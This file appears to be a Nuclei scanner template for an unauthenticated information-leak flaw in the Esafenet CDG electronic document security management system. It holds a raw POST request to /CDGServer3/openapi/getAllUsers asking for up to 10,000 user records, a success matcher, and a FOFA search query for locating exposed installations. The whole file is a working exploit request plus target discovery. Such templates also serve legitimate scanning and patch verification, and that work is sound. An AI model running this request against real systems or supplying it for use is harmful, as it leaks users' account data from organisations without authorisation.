http:
    - matchers:
        - condition: and
          dsl:
            - status_code_1 == 200
            - body_1 != ""
          type: dsl
      matchers-condition: and
      max-redirects: 3
      raw:
        - |-
          @timeout: 30s
          POST /CDGServer3/openapi/getAllUsers HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
          Content-Type: application/x-www-form-urlencoded
          Content-Length: 27

          pageSize=10000&pageNumber=1
id: yisaitong-CDG-getAllUsers-info-leak
info:
    author: xx
    description: 亿赛通-电子文档安全管理系统getAllUsers信息泄露
    metadata:
        fofa-query: body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp"
    name: 亿赛通-电子文档安全管理系统getAllUsers信息泄露
    severity: high
    tags:
        - yisaitong
        - identity-bypass
        - 亿赛通-电子文档安全管理系统
